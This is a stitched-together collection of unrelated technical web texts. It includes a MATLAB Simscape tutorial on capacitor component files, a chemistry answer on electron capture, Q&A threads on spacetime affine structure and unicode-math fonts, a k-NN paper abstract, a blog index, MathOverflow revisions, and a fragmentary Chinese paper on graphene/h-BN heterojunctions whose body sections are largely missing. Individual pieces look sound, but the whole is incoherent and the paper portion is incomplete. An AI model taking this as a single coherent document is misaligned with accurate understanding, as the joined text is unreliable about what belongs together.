The example library comes built and on your path so that it is readily executable. However, it is recommended that you copy the source files to a new directory, for which you have write permission, and add that directory to your MATLAB® path. This will allow you to make changes and rebuild the library for yourself.

The source files for the example library are in the following package directory:

`matlabroot/toolbox/physmod/simscape/simscapedemos/+Capacitors`

where `matlabroot` is the MATLAB root directory on your machine, as returned by entering

```
matlabroot
```

in the MATLAB Command Window.

After copying the files, change the directory name `+Capacitors` to another name, for example `+MyCapacitors`, so that your copy of the library builds with a unique name.

### Building the Custom Library

To build the library, type

```
ssc_build MyCapacitors
```

in the MATLAB Command Window. If building from within the `+MyCapacitors` package directory, you can omit the argument and type just

```
ssc_build
```

When the build completes, open the generated library by typing

```
MyCapacitors_lib
```

For more information on the library build process, see Building Custom Block Libraries.

To add a block, write a corresponding component file and place it in the package directory. For example, the Ideal Capacitor block in your `MyCapacitors_lib` library is produced by the `IdealCapacitor.ssc` file. Open this file in the MATLAB Editor and examine its contents.
```
component IdealCapacitor
% Ideal Capacitor
% Models an ideal (lossless) capacitor. The output current I is related
% to the input voltage V by I = C*dV/dt where C is the capacitance.

% Copyright 2008-2017 The MathWorks, Inc.

  nodes
    p = foundation.electrical.electrical; % +:top
    n = foundation.electrical.electrical; % -:bottom
  end

  parameters
    C = { 1, 'F' }; % Capacitance
  end

  variables
    i = { 0, 'A' }; % Current
    v = {value = { 0, 'V' }, priority = priority.high}; % Voltage drop
  end

  branches
    i : p.i -> n.i; % Through variable i from node p to node n
  end

  equations
    assert(C > 0)
    v == p.v-n.v; % Across variable v from p to n
    i == C*v.der; % Capacitor equation
  end

end
```

First, let us examine the elements of the component file that affect the block appearance. Double-click the Ideal Capacitor block in the `MyCapacitors_lib` library to open its dialog box, and compare the block icon and dialog box to the contents of the `IdealCapacitor.ssc` file. The block name, Ideal Capacitor, is taken from the comment on line 2. The comments on lines 3 and 4 are then used to populate the block description in the dialog box. The block ports are defined by the nodes section. The comment expressions at the end of each line control the port label and location. Similarly, in the parameters section, the comments are used to define parameter names in the block dialog box. For details, see Customizing the Block Name and Appearance.

Also notice that in the equations section there is an assert to ensure that the capacitance value is always greater than zero. This is good practice to ensure that a component is not used outside of its domain of validity. The Simscape Foundation library blocks have such checks implemented where appropriate.

### Adding Detail to a Component

In this example library there are two additional components that can be used for ultracapacitor modeling. These components are evolutions of the Ideal Capacitor.
It is good practice to build component models incrementally, adding and testing features one at a time.

Ideal Ultracapacitor

Ultracapacitors, as their name suggests, are capacitors with a very high capacitance value. Unlike for an ideal capacitor, the relationship between voltage and charge is not constant. Suppose a manufacturer data sheet gives a graph of capacitance as a function of voltage, and that capacitance increases approximately linearly with voltage from 1 farad at zero volts to 1.5 farads when the voltage is 2.5 volts. If the capacitor voltage is denoted v, then the capacitance can be approximated as:

`$C=1+0.2·v$`

For a capacitor, current i and voltage v are related by the standard equation

`$i=C\frac{dv}{dt}$`

and hence

`$i=\left({C}_{0}+{C}_{v}·v\right)\frac{dv}{dt}$`

where C0 = 1 and Cv = 0.2. This equation is implemented by the following line in the equation section of the Simscape file `IdealUltraCapacitor.ssc`:

`i == (C0 + Cv*v)*v.der;`

In order for the Simscape software to interpret this equation, the variables (`v` and `i`) and the parameters (`C0` and `Cv`) must be defined in the declaration section. For more information, see Declare Component Variables and Declare Component Parameters.

### Adding a Component with an Internal Variable

Implementing some component equations requires the use of internal variables. An example is an ultracapacitor with resistive losses. There are two resistive terms: the effective series resistance R, and the self-discharge resistance Rd. Because of the topology, it is not possible to express the capacitor equations directly in terms of the through and across variables i and v.

Ultracapacitor with Resistive Losses

This block is implemented by the component file `LossyUltraCapacitor.ssc`. Open this file in the MATLAB Editor and examine its contents.

```
component LossyUltraCapacitor
% Lossy Ultracapacitor
% Models an ultracapacitor with resistive losses. The capacitance C
% depends on the voltage V according to C = C0 + V*dC/dV. A
% self-discharge resistance is included in parallel with the capacitor,
% and an equivalent series resistance in series with the capacitor.

% Copyright 2008-2017 The MathWorks, Inc.

  nodes
    p = foundation.electrical.electrical; % +:top
    n = foundation.electrical.electrical; % -:bottom
  end

  parameters
    C0 = { 1, 'F' };    % Nominal capacitance C0 at V=0
    Cv = { 0.2, 'F/V'}; % Rate of change of C with voltage V
    R  = {2, 'Ohm' };   % Effective series resistance
    Rd = {500, 'Ohm' }; % Self-discharge resistance
  end

  variables
    i = { 0, 'A' }; % Current
    vc = {value = { 0, 'V' }, priority = priority.high}; % Capacitor voltage
  end

  branches
    i : p.i -> n.i; % Through variable i from node p to node n
  end

  equations
    assert(C0 > 0)
    assert(R > 0)
    assert(Rd > 0)
    let
      v = p.v-n.v; % Across variable v from p to n
    in
      i == (C0 + Cv*vc)*vc.der + vc/Rd; % Equation 1
      v == vc + i*R;                    % Equation 2
    end
  end

end
```

The additional variable vc denotes the voltage across the capacitor. The equations can then be expressed in terms of v, i, and vc using Kirchhoff’s current and voltage laws. Summing currents at the capacitor + node gives the first Simscape equation:

`i == (C0 + Cv*vc)*vc.der + vc/Rd;`

Summing voltages gives the second Simscape equation:

`v == vc + i*R;`

As a check, the number of equations required for a component used in a single connected network is given by the number of ports plus the number of internal variables, minus one. This is not necessarily true for all components (for example, one exception is mass), but in general it is a good rule of thumb. Here this gives 2 + 1 - 1 = 2.

In the Simscape file, the initial condition (initial voltage in this example) is applied to the variable `vc` with `priority = priority.high`, because this is a differential variable. In this case, `vc` is readily identifiable as the differential variable, as it has the `der` (differentiator) operator applied to it.
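Equation 1 and Equation 2 fully determine the block once the port voltage is prescribed. As a rough numerical cross-check (a sketch in plain Python, not Simscape; parameter values are the defaults from the `.ssc` file), one can eliminate i via Equation 2 and integrate vc with explicit Euler. For a constant applied voltage, vc should settle to the divider value v·Rd/(R+Rd), where the derivative term vanishes and the series and self-discharge currents balance.

```python
# Explicit-Euler sketch of the lossy ultracapacitor equations:
#   i == (C0 + Cv*vc)*dvc/dt + vc/Rd     (Equation 1, current balance)
#   v == vc + i*R                        (Equation 2, voltage balance)
# Eliminating i gives: dvc/dt = ((v - vc)/R - vc/Rd) / (C0 + Cv*vc)
C0, Cv, R, Rd = 1.0, 0.2, 2.0, 500.0  # defaults from LossyUltraCapacitor.ssc

def simulate(v_applied, t_end, dt=1e-3, vc0=0.0):
    vc = vc0
    for _ in range(int(t_end / dt)):
        i = (v_applied - vc) / R              # from Equation 2
        dvc = (i - vc / Rd) / (C0 + Cv * vc)  # from Equation 1
        vc += dt * dvc
    return vc

vc_final = simulate(v_applied=2.0, t_end=60.0)
vc_steady = 2.0 * Rd / (R + Rd)  # steady state: dvc/dt = 0
assert abs(vc_final - vc_steady) < 1e-3
```

Setting R very small and Rd very large recovers the ideal ultracapacitor behavior from the previous section.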
### Customizing the Block Icon

The capacitor blocks in the example library `MyCapacitors_lib` have icons associated with them. During the library build, if there is an image file in the directory with the same name as the Simscape component file, then it is used to define the icon for the block. For example, the Ideal Capacitor block defined by `IdealCapacitor.ssc` uses `IdealCapacitor.jpg` to define its block icon. If you do not include an image file, then the block displays its name in place of an icon. For details, see Customize the Block Icon.
https://socratic.org/questions/how-can-i-write-the-electron-capture-equation
# How can I write the electron capture equation?

In electron capture, a proton in the nucleus absorbs an inner-shell electron and becomes a neutron, emitting an electron neutrino:

$${}_{1}^{1}\text{p} + {}_{-1}^{0}\text{e} \rightarrow {}_{0}^{1}\text{n} + {}_{0}^{0}\nu$$
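A quick way to sanity-check any nuclear equation like the one above is to verify that the mass numbers (superscripts) and charges (subscripts) each sum to the same totals on both sides of the arrow. A minimal sketch in Python (names are illustrative):

```python
# Each particle is a (mass_number, charge) pair. Electron capture:
#   p + e -> n + neutrino
proton   = (1, 1)
electron = (0, -1)
neutron  = (1, 0)
neutrino = (0, 0)

def balanced(lhs, rhs):
    # A nuclear equation must conserve mass number and charge separately.
    return (sum(a for a, _ in lhs) == sum(a for a, _ in rhs)
            and sum(z for _, z in lhs) == sum(z for _, z in rhs))

assert balanced([proton, electron], [neutron, neutrino])
```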
https://physics.stackexchange.com/questions/563102/why-dont-we-assume-a-vector-space-structure-for-spacetime
# Why don't we assume a vector space structure for spacetime?

At the outset I'll state that I understand completely why, physically speaking, there's no preferred frame - that's not what I'm asking in the question. I'm not sure why we don't give spacetime a vector space structure though. I realize that doing so forces us to identify a certain unique point in spacetime as the "universal" origin. But in the mathematical formulation, I don't see what's stopping us from doing that. Even if we can't physically pinpoint a preferred point in spacetime, it's an entirely different matter to choose an origin for mathematical convenience. What can go wrong with defining a vector space structure on spacetime even if we assume flat spacetime? And in the case of general relativity, what can go wrong with assuming that curved spacetime is embedded in an $$\mathbb{R}^4$$ vector space?

If you assume flat spacetime and cartesian coordinates, then there's no problem with defining an affine structure on spacetime, and indeed this is often done by various authors who call $$x^\mu$$ the coordinates of a spacetime displacement vector. The situation is a bit more complicated in curvilinear coordinates, because the same vector will have different components depending on the base point to which it is attached, but this is not necessarily a deal-breaker. At the very least, one could define the affine structure with respect to an underlying cartesian coordinate system.

A crucial aspect of a (real) affine structure is that starting from a given point $$a$$, a vector $$\vec v$$ defines an entire affine subspace, which consists of all points of the form $$a + \lambda \vec v$$ for $$\lambda \in \mathbb R$$. Denote this subspace $$S(\vec v,a)$$. If a point $$b\neq a$$ lies in $$S(\vec v,a)$$ and $$S(\vec u,a)$$, then $$b = a + \lambda_1 \vec v = a + \lambda _2 \vec u$$ $$\implies \vec u = \frac{\lambda_1}{\lambda_2} \vec v$$ and therefore $$S(\vec v,a) = S(\vec u,a)$$.
In this case, $$\vec v$$ and $$\vec u$$ are called parallel; we also say that $$\vec v$$ is tangential to $$S(\vec v,a)$$ at $$a$$. If $$a$$ and $$b$$ belong to the same affine subspace, then a tangent vector to that subspace at $$a$$ must be parallel to a tangent vector at $$b$$ (this follows trivially by definition); we might therefore say that an affine subspace is an autoparallel, which means simply that all of its tangent vectors are parallel to one another. In a space with nonzero curvature, this breaks down. Consider the space $$S^2$$ - the surface of a sphere. Let our starting point $$a$$ be the north pole, and consider two vectors - $$\vec v$$, which takes us to Manhattan, and $$\vec u$$, which takes us to Paris. These vectors would correspond to affine subspaces $$S(\vec v,a)$$ and $$S(\vec u,a)$$. Note that straight lines do not exist on the surface of a sphere; however, the notion of autoparallel curves still survives. The problem is that the south pole is in both $$S(\vec v,a)$$ and $$S(\vec u,a)$$, and via our analysis above, that implies that $$S(\vec v,a)=S(\vec u,a)$$, which clearly cannot be true. The reason for the breakdown is as follows. Given two points $$a$$ and $$b$$ in an affine space, there must be a unique displacement vector $$\vec v = b-a$$ which takes you from $$a$$ to $$b$$, and therefore a unique affine subspace of $$a$$ in which $$b$$ lies. On the surface of a sphere, this cannot possibly hold, because any two autoparallel curves which pass through a given point will also intersect at the antipodal point. As a result, there is no unique vector which takes you from a point to its antipode, and so the axioms of the affine space cannot be satisfied. One could object to this reasoning on the grounds that $$S^n$$ is closed, and therefore cannot be thought of as a manifold built on $$\mathbb R^4$$ as a carrier set as specified in the question. However, this can be countered with the following points. 1. 
There is no particular reason that we should rule such spaces out. A closed FLRW universe, for example, would have $$\mathbb R \times S^3$$ as a carrier set, and in principle there's no reason to think that we don't live in such a universe.

2. It is a generic feature of spaces with nonzero curvature that autoparallels (which are also geodesics in the standard formulation of GR) can intersect at multiple points. Therefore, while the situation is not necessarily as degenerate as the case of $$S^2$$ (in which every autoparallel passing through a point will also pass through its antipode), it remains the general case that there are points $$a\neq b$$ between which there is no unique geodesic, and therefore no unique way to assign a displacement vector to $$b-a$$.

3. Even in the absence of such intersections, vector addition on an affine space must commute, so $$a+(\vec v_1+\vec v_2) = (a+\vec v_1)+\vec v_2 = (a+\vec v_2)+\vec v_1$$. However, in the general case this does not hold; following $$\vec v_1$$ and then $$\vec v_2$$ along their corresponding geodesics leads us to a different point than following $$\vec v_2$$ and then $$\vec v_1$$, as per the following example$$^\dagger$$. It is precisely this non-commutativity which defines the presence of intrinsic curvature, and so we are led to the conclusion that if a space is curved, an affine structure (which necessarily includes commutative vector addition) cannot be defined.

$$^\dagger$$The pictured manifold is the surface $$\mathcal M := \big\{(t,x,y)\in \mathbb R^3 \ | \ -t^2+x^2+y^2=1\big\}$$ In the $$(u,v)$$-coordinate system, in which $$t = \sinh(u)$$, $$x = \cosh(u)\cos(v)$$, $$y = \cosh(u)\sin(v)$$, the metric (which is inherited via the embedding of $$\mathcal M$$ in (1+2)-dimensional Minkowski space) takes the form $$g_{\mu \nu} = \pmatrix{-1 & 0 \\ 0 &\cosh^2(u)}$$ and the non-vanishing connection coefficients are $$\Gamma^{u}_{vv} = \sinh(u)\cosh(u)$$ $$\Gamma^{v}_{uv}=\Gamma^{v}_{vu} = \tanh(u)$$ • Excellent answer!
One doubt related to the first part of your answer: why assume an affine structure and not a linear one? Isn't a linear system easier to work with? For example, even with Earth, we don't define coordinates such that there are no absolute North/South poles. We definitely consider unique points as the poles because it's convenient, even though physically speaking, there's nothing special about the North/South poles compared to any other pair of polar opposite points. So why not do the same for spacetime? (cont'd) – user9343456 Jul 2 '20 at 9:03
• (cont'd)... Even though there's no privileged point in spacetime, for mathematical convenience, that still shouldn't stop us from defining an origin as a matter of convention, right? This would mean a linear instead of affine structure and would make calculations easier? [all this assuming flat spacetime] – user9343456 Jul 2 '20 at 9:04
• @user9343456 I am a bit confused - we use coordinate systems with privileged points all the time, including polar coordinates, in both flat and curved spacetime. But you're talking about adding and subtracting points in spacetime from one another, which is entirely different. – J. Murray Jul 2 '20 at 12:58
• @user9343456 Since every vector space can be considered an affine space, the latter is more general, so there's no harm in talking about it instead of a linear structure. And in Newtonian physics, when we talk about displacement and force and momentum, those are all vectors tied to an affine structure, not a linear one. – J. Murray Jul 2 '20 at 13:01
• So basically, even though a linear structure would be the easier option, we opt for affine because it's built on weaker assumptions. We prefer more generality / weaker assumptions over computational ease - is that the case? – user9343456 Jul 2 '20 at 13:07

What can go wrong with defining a vector space structure on spacetime even if we assume flat spacetime?
Actually, Minkowski space-time can be considered a $$4$$-dimensional vector space equipped with an indefinite, nondegenerate symmetric bilinear form. Possible problem with the "universal" origin can be easily solved by introducing an affine space structure. About a possible embedding in $$\mathbb{R}^4$$, things are not as simple. You may find some key information here.
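The non-commutativity point raised in the curvature discussion above is easy to verify numerically. On the sphere, "move along a geodesic" corresponds to a rotation; a minimal Python sketch (illustrative, not from the thread) shows that two such moves applied in opposite orders land at different points, unlike vector addition in an affine space:

```python
import numpy as np

def rot_x(a):
    # Rotation about the x-axis: transports a point along a great circle.
    c, s = np.cos(a), np.sin(a)
    return np.array([[1, 0, 0], [0, c, -s], [0, s, c]])

def rot_y(a):
    # Rotation about the y-axis.
    c, s = np.cos(a), np.sin(a)
    return np.array([[c, 0, s], [0, 1, 0], [-s, 0, c]])

p = np.array([0.0, 0.0, 1.0])        # start at the north pole of S^2
q1 = rot_y(1.0) @ (rot_x(1.0) @ p)   # move "v1" first, then "v2"
q2 = rot_x(1.0) @ (rot_y(1.0) @ p)   # move "v2" first, then "v1"

# In flat space the two orders would agree; on the sphere they do not.
assert np.linalg.norm(q1 - q2) > 0.1
```

Both endpoints still lie on the sphere (rotations preserve the norm), yet they differ, which is exactly the failure of commutative "point + vector" addition described in item 3.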
https://paperswithcode.com/paper/universal-consistency-of-the-k-nn-rule-in
# Universal consistency of the $k$-NN rule in metric spaces and Nagata dimension

28 Feb 2020

The $k$ nearest neighbour learning rule (under the uniform distance tie breaking) is universally consistent in every metric space $X$ that is sigma-finite dimensional in the sense of Nagata. This was pointed out by Cérou and Guyader (2006) as a consequence of the main result by those authors, combined with a theorem in real analysis sketched by D. Preiss (1971) (and elaborated in detail by Assouad and Quentin de Gromard (2006)). We show that it is possible to give a direct proof along the same lines as the original theorem of Charles J. Stone (1977) about the universal consistency of the $k$-NN classifier in the finite dimensional Euclidean space. The generalization is non-trivial because of the distance ties being more prevalent in the non-euclidean setting, and on the way we investigate the relevant geometric properties of the metrics and the limitations of the Stone argument, by constructing various examples.
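For readers unfamiliar with the rule the abstract refers to, here is a minimal sketch of $k$-NN classification in a general metric space (plain Python; the paper's uniform tie-breaking is simplified here to "first $k$ by sorted distance", and all names are illustrative):

```python
from collections import Counter

def knn_predict(train, labels, metric, query, k=3):
    # Rank training points by distance to the query under the given metric;
    # predict the majority label among the k nearest.
    order = sorted(range(len(train)), key=lambda j: metric(train[j], query))
    votes = Counter(labels[j] for j in order[:k])
    return votes.most_common(1)[0][0]

# Toy example on the real line with the usual metric d(a, b) = |a - b|.
train = [0.0, 0.1, 0.2, 5.0, 5.1, 5.2]
labels = ["low", "low", "low", "high", "high", "high"]
d = lambda a, b: abs(a - b)
assert knn_predict(train, labels, d, 0.05) == "low"
assert knn_predict(train, labels, d, 4.9) == "high"
```

Note that `metric` can be any distance function, which is the setting of the paper: nothing in the rule itself requires Euclidean structure, only a way to rank points by distance (and a policy for breaking ties).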
https://dataleek.io/
## AirBnB Visualization This is a followup visualization from my post on analyzing Boston’s AirBnB. The below embedding is less than perfect, so please check it out fullscreen. If it’s not rendering well for you, this is what you should see. The Python to convert the raw data to geojson is super straightforward. … ## Digging into my Discord I run a Discord server for my friends. We’ve essentially given up texting and now use Discord for virtually all communication. This server has been running since about January 2016, and we now have around 75 users and collectively we’ve sent almost 200,000 messages. I scraped all of this data … ## Virus Propagation and Markov Khan Academy Virus Propagation Part of the interview process at Khan Academy is to complete their interview project. This project deals with virus propagation through a directed network. We will be using the terms “graph” and “network” interchangeably, but I’m referring to the same thing for both. From a high … ## Integrating SMS with Twilio Let’s say that you need to integrate SMS capabilities into your project, and let’s also say that you’re using python. You can use Twilio to very easily integrate texts directly into your application. Setting Up Twilio First though, you’ll need a Twilio account. Go to their signup page, and create … ## Political Boundaries and Simulations Adapted as a talk for the Boulder Python Meetup Download archive here, or from gitlab.com/thedataleek/politicalboundaries. Press the space-bar to proceed to the next slide. See here for a brief tutorial Expand Code ## One Dimensional Maps Creating one-dimensional maps is a very easy and straightforward process that can be used to explore chaotic behavior. 
Given some function $f$, we take an initial value $x_0$ and use the iterative process $$x_{n+1} = f\left(x_n\right)$$ One popular map to explore is the Logistic Map, defined as x_{n+1} = …

## An Introduction to Plotting in Python

After having some Applied Math friends rant to me about how awful plotting was in Python, I decided to write up a quick guide to hopefully change their minds. Numpy This assumes a basic familiarity with numpy, although I’ll go over the basics really quickly just in case. The syntax/API …

## The Python Typing Module

The typing module added in Python 3.5 (see reference docs here) adds additional types and meta-types to allow for more control over python type hints. In this post we’ll talk about what this module adds and what neat things you can do with it. This is the third post in …

## Python Type Hinting

In Python 3.5 and greater an “optional type hinting syntax” was added. This is part of a gradual typing implementation (gradual typing is essentially adding a few types to an untyped codebase, or only partially typing the codebase as you go). This is the second post in a multi-part series …
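The one-dimensional map iteration described in the excerpt above takes only a few lines of code. A sketch, assuming the standard logistic map $x_{n+1} = r\,x_n(1-x_n)$ (the excerpt's definition is truncated, so that form is an assumption here):

```python
def iterate_map(f, x0, n):
    # Repeatedly apply f, returning the orbit x0, f(x0), f(f(x0)), ...
    orbit = [x0]
    for _ in range(n):
        orbit.append(f(orbit[-1]))
    return orbit

def logistic(r):
    # The logistic map x -> r*x*(1-x) with growth parameter r.
    return lambda x: r * x * (1 - x)

# For r = 2.5 the orbit settles onto the stable fixed point 1 - 1/r = 0.6.
orbit = iterate_map(logistic(2.5), 0.2, 200)
assert abs(orbit[-1] - 0.6) < 1e-9
```

Raising `r` past about 3.57 is where the chaotic behavior mentioned in the post appears; plotting the tail of the orbit against `r` gives the familiar bifurcation diagram.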
https://tex.stackexchange.com/questions/227033/why-cant-i-use-my-font-with-unicode-math?noredirect=1
# Why can't I use my font with unicode-math?

```
\documentclass{article}
\usepackage{unicode-math}
\setmathfont{Latin Modern Sans}
\usepackage{mwe}
\blindmathtrue
\begin{document}
\Blinddocument
\end{document}
```

The above fails with the error

```
ERROR: Internal error: bad native font flag in `map_char_to_glyph'
--- TeX said ---
--- HELP ---
No help available
```

What is causing this error, and how can I pick fonts to avoid this in the future?

• Latin Modern Sans has no math table. You have to use a font which has one, such as Latin Modern Math. If you want to use a font without a math table in math mode with xelatex, you have to use the mathspec package. – Henri Menke Feb 7 '15 at 15:23
• See also my question here: tex.stackexchange.com/questions/118244/… – Henri Menke Feb 7 '15 at 15:23
• Not having a math table is perhaps a sign that it's not intended for math, though as with classic TeX math fonts, once you have set up the main math font you can, if required, set up text fonts for use as math alphabets – David Carlisle Feb 7 '15 at 15:26
• For explanation, see my answer here: tex.stackexchange.com/a/166185. For information on fonts which will work, see my answer here: tex.stackexchange.com/a/219414. – cfr Feb 7 '15 at 15:31

You have two options to overcome this issue.

# 1. Use an OpenType Math Font

For unicode-math to work, you have to use an OpenType font which provides the math table, such as Latin Modern Math. This unfortunately defeats the implicit purpose of your MWE, which is to use a sans serif font for maths.

```
\documentclass{article}
\pagestyle{empty}
\usepackage{unicode-math}
\setmathfont{Latin Modern Math}
\begin{document}
Lorem ipsum
$\sum_{k=0}^\infty a_0q^k = \lim_{n\to\infty}\sum_{k=0}^n a_0q^k
 = \lim_{n\to\infty} a_0\frac{1-q^{n+1}}{1-q} = \frac{a_0}{1-q}$
dolor sit amet
\end{document}
```

# 2. Use the mathspec Package

The mathspec package allows using any OpenType font for math mode (at the cost of bad spacing).
```
\documentclass{article}
\usepackage{mathspec}
\setmathfont(Latin,Digits,Greek){Latin Modern Sans}
\setmathrm{Latin Modern Sans}
\begin{document}
Lorem ipsum
$\sum_{k=0}^\infty a_0q^k = \lim_{n\to\infty}\sum_{k=0}^n a_0q^k
 = \lim_{n\to\infty} a_0\frac{1-q^{n+1}}{1-q} = \frac{a_0}{1-q}$
dolor sit amet
\end{document}
```
http://mathoverflow.net/revisions/4596/list
3: deleted 288 characters in body

It is well-known that

A: The series of the reciprocals of the primes diverges

My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers. For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ (different from $P$) such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ contains infinitely many prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$?

Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers?

2: added 33 characters in body; deleted 7 characters in body

It is well-known that

A: The series of the reciprocals of the primes diverges

My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers. For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ (different from $P$) such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ ~~doesn't contain any~~ contains infinitely many prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$?

Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers?

1

# On the series 1/2 + 1/3 + 1/5 + 1/7 + 1/11 + ...

It is well-known that

A: The series of the reciprocals of the primes diverges

My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers.
For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ doesn't contain any prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$? Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers?
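Property A itself is easy to illustrate numerically. The following sketch (added for illustration; the sieve bound and function names are my own, not part of the question) shows the partial sums of $\sum 1/p$ creeping upward, consistent with their known $\log\log n$ growth:

```python
# Numerical illustration of property A: partial sums of the reciprocals
# of the primes grow without bound (roughly like log log n).
# This is only a sketch, of course, not a proof of divergence.

def primes_up_to(n):
    """Simple sieve of Eratosthenes returning all primes <= n."""
    sieve = bytearray([1]) * (n + 1)
    sieve[0:2] = b"\x00\x00"
    for p in range(2, int(n ** 0.5) + 1):
        if sieve[p]:
            sieve[p * p :: p] = bytearray(len(sieve[p * p :: p]))
    return [i for i in range(2, n + 1) if sieve[i]]

def prime_reciprocal_sum(n):
    """Partial sum of 1/p over primes p <= n."""
    return sum(1.0 / p for p in primes_up_to(n))

if __name__ == "__main__":
    for bound in (10**3, 10**4, 10**5):
        print(bound, prime_reciprocal_sum(bound))
```

The growth is extremely slow, which is part of what makes the question about "fatness" of the primes interesting: the divergence is just barely there.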
https://www.hanspub.org/journal/PaperInformation.aspx?paperID=54392
# Band Structure and Quantum Phase Transition of Graphene/h-BN Heterojunction under Local Potential Control

DOI: 10.12677/CMP.2022.113007. Supported by the National Natural Science Foundation of China.

Abstract: The band structure and quantum phase transition of a graphene/hexagonal boron nitride (h-BN) heterojunction under local potentials are studied by the tight-binding method. For a given intrinsic spin-orbit coupling strength in the graphene layer, the graphene layer is in the quantum spin Hall state while the h-BN layer is in the insulating state. As the local potential of the graphene layer increases, the system changes from a quantum spin Hall state to a semiconductor state. New gapless edge states can be generated by tuning the local potential of the h-BN layer, so that the quantum spin Hall state of the graphene layer becomes a quantum spin Hall state composed of edge states within and between the layers.

1. Introduction

2. Model and Methods

The Hamiltonian of the graphene monolayer is

$H_{MLG} = -t_1 \sum_{\langle i,j \rangle, \alpha} C_{i\alpha}^{\dagger} C_{j\alpha} + i\lambda \sum_{\langle\langle i,j \rangle\rangle, \alpha\beta} \upsilon_{ij} C_{i\alpha}^{\dagger} (S_z)_{\alpha\beta} C_{j\beta} + \sum_{i,\alpha} V_i C_{i\alpha}^{\dagger} C_{i\alpha}$ (1)

and that of the h-BN layer is

$H_{h\text{-}BN} = -t_2 \sum_{\langle i,j \rangle, \alpha} C_{i\alpha}^{\dagger} C_{j\alpha} + \sum_{i,\alpha} E_i C_{i\alpha}^{\dagger} C_{i\alpha} + \sum_{i,\alpha} V_i C_{i\alpha}^{\dagger} C_{i\alpha}$ (2)

The Hamiltonian of the Bernal-stacked graphene/h-BN heterojunction is

$H = H_{MLG} + H_{h\text{-}BN} + t_{\perp} \sum_{i \in T, j \in B, \alpha} \left( C_{i\alpha}^{\dagger} C_{j\alpha} + C_{j\alpha}^{\dagger} C_{i\alpha} \right)$ (3)

The quantity $C_{\alpha\beta}$ is obtained by integrating the Berry curvature $\Omega_{xy}$ over the Brillouin zone,

$C_{\alpha\beta} = \frac{1}{2\pi} \sum_{n} \int_{BZ} \mathrm{d}k_x \, \mathrm{d}k_y \, (\Omega_{xy})_{\alpha\beta}$ (4)

$\Omega_{xy} = -\sum_{n' \neq n} \frac{2 \, \mathrm{Im} \langle \Psi_{nk} | v_x | \Psi_{n'k} \rangle \langle \Psi_{n'k} | v_y | \Psi_{nk} \rangle}{\omega_n - \omega_{n'}}$ (5)

Figure 1. (a) Schematic diagram of Bernal-stacked zigzag-edged GBNNR. The bottom layer is the h-BN layer and the top layer is the graphene layer. y is the periodic direction and the x direction contains N = 80 sites. Green, yellow and blue solid circles represent N, B and C atoms, respectively. (b) Schematic diagram of the graphene/h-BN heterojunction under local potentials. V1 and V2 are applied in the upper and lower half regions of the graphene layer respectively, and V3 and V4 are applied in the upper and lower half regions of the h-BN layer respectively.

3. Results and Discussion

Table 1. Tight-binding parameters of graphene/h-BN heterojunctions calculated by density functional theory [28] (unit of energy: eV)

Figure 2. (a) Band structure of GBNNR with zero local potential and ISOC; (b) Band gap ΔE of GBNNR as a function of V1

Figure 3. Left column is the band structure of GBNNR. The red and black curves represent the spin-up and spin-down energy bands respectively. The parameters are: λ = 0.02t1, (a) V1 = 0 eV; (c) V1 = 0.2 eV; (e) V1 = 1.2 eV. (b) The blue curve is the bandgap of the heterojunction under periodic boundary conditions, i.e. the bulk gap; the red curve is the GBNNR bandgap. (d) and (f) are the schematic diagrams of the probability distributions of edge states and the edge state propagation in (c), respectively.

Figure 4. (a) Band structure of GBNNR with λ = 0.02t1, V4 = −3.665 eV. The red and black curves represent the spin-up and spin-down energy bands respectively. (b) and (c) are schematic diagrams of the probability distributions of edge states and the edge state propagation in (a), respectively.

4. Conclusion

NOTES

*Corresponding author.

[1] Sarma, S.D., Adam, S., Hwang, E.H., et al. (2011) Electronic Transport in Two-Dimensional Graphene. Reviews of Modern Physics, 83, 407-470. https://doi.org/10.1103/RevModPhys.83.407
[2] Rutherglen, C., Jain, D. and Burke, P. (2009) Nanotube Electronics for Radiofrequency Applications. Nature Nanotechnology, 4, 811-819.
https://doi.org/10.1038/nnano.2009.355
[3] Moon, P. and Koshino, M. (2014) Electronic Properties of Graphene/Hexagonal-Boron-Nitride Moiré Superlattice. Physical Review B, 90, Article ID: 155406. https://doi.org/10.1103/PhysRevB.90.155406
[4] N'Diaye, A.T., Bleikamp, S., Feibelman, P.J., et al. (2006) Two-Dimensional Ir Cluster Lattice on a Graphene Moiré on Ir(111). Physical Review Letters, 97, Article ID: 215501. https://doi.org/10.1103/PhysRevLett.97.215501
[5] Varchon, F., Feng, R., Hass, J., et al. (2007) Electronic Structure of Epitaxial Graphene Layers on SiC: Effect of the Substrate. Physical Review Letters, 99, Article ID: 126805. https://doi.org/10.1103/PhysRevLett.99.126805
[6] Sachs, B., Wehling, T.O., Katsnelson, M.I., et al. (2011) Adhesion and Electronic Structure of Graphene on Hexagonal Boron Nitride Substrates. Physical Review B, 84, Article ID: 195414. https://doi.org/10.1103/PhysRevB.84.195414
[7] Slotman, G.J., Wijk, M.V., Zhao, P.L., et al. (2015) Effect of Structural Relaxation on the Electronic Structure of Graphene on Hexagonal Boron Nitride. Physical Review Letters, 115, Article ID: 186801. https://doi.org/10.1103/PhysRevLett.115.186801
[8] Fan, Y., Zhao, M., Wang, Z., et al. (2011) Tunable Electronic Structures of Graphene/Boron Nitride Heterobilayers. Applied Physics Letters, 98, Article ID: 083103. https://doi.org/10.1063/1.3556640
